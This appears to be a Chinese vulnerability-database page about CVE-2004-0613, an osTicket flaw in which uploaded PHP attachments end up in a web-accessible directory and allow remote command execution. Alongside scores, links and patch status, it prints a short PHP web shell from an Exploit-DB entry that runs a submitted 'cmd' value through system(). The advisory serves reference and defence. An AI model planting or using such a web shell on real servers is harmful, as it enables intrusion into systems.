| CVE-2004-0613 |
|
发布时间 :2004-12-06 00:00:00 | ||
| 修订时间 :2017-07-10 21:30:18 | ||||
| NMCOES |
[原文]osTicket allows remote attackers to view sensitive uploaded files and possibly execute arbitrary code via an HTTP request that uploads a PHP file to the ticket attachments directory.
[CNNVD]osTicket New Ticket附件远程命令执行漏洞(CNNVD-200412-035)
osTicket是一款基于WEB的客户服务管理程序。
osTicket的上传功能实现存在问题,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
用户建立一个新的ticket,然后以这个ticket上传一个文件,就可以用以下方式访问:
www.example.com/osticket/attachments/
如果用户上传的PHP文档包含如下内容:
echo "
- CVSS (基础分值)
| CVSS分值: | 7.5 | [严重(HIGH)] |
| 机密性影响: | [--] | |
| 完整性影响: | [--] | |
| 可用性影响: | [--] | |
| 攻击复杂度: | [--] | |
| 攻击向量: | [--] | |
| 身份认证: | [--] |
- CPE (受影响的平台与产品)
| 产品及版本信息(CPE)暂不可用 |
- OVAL (用于检测的技术细节)
| 未找到相关OVAL定义 |
- 官方数据库链接
- 其它链接及资源
|
http://marc.info/?l=bugtraq&m=108786779500957&w=2 (UNKNOWN) BUGTRAQ 20040621 Multiple osTicket exploits! |
|
http://www.securityfocus.com/bid/10586 (VENDOR_ADVISORY) BID 10586 |
|
https://exchange.xforce.ibmcloud.com/vulnerabilities/16477 (UNKNOWN) XF osticket-php-file-upload(16477) |
|
https://exchange.xforce.ibmcloud.com/vulnerabilities/16478 (UNKNOWN) XF osticket-view-attachments(16478) |
- 漏洞信息
| osTicket New Ticket附件远程命令执行漏洞 | |
| 高危 | 设计错误 |
| 2004-12-06 00:00:00 | 2005-10-20 00:00:00 |
| 远程 | |
| osTicket是一款基于WEB的客户服务管理程序。 osTicket的上传功能实现存在问题,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。 用户建立一个新的ticket,然后以这个ticket上传一个文件,就可以用以下方式访问: www.example.com/osticket/attachments/ 如果用户上传的PHP文档包含如下内容: echo " |
|
- 公告与补丁
|
厂商补丁: osTicket -------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.osticket.com/ |
- 漏洞信息 (24225)
| osTicket STS 1.2 Attachment Remote Command Execution Vulnerability (EDBID:24225) | |
| php | webapps |
| 2004-06-21 | Verified |
| 0 | Guy Pearce |
| N/A | [点击下载] |
source: http://www.securityfocus.com/bid/10586/info osTicket is reported prone to a remote command execution vulnerability. The issue is reported to present itself because attachments submitted as a part of a support ticket request are stored with a predictable name in a known web accessible location. <?PHP echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>"; if (!$cmd)die; system($cmd); ?>
- 漏洞信息
| 15692 | |
| osTicket Attachment Handling File Upload Arbitrary Code Execution | |
| Loss of Integrity | |
- 漏洞描述
- 时间线
| 2004-06-21 | Unknow |
| Unknow | Unknow |
We must accept finite disappointment, but we must never lose infinite hope.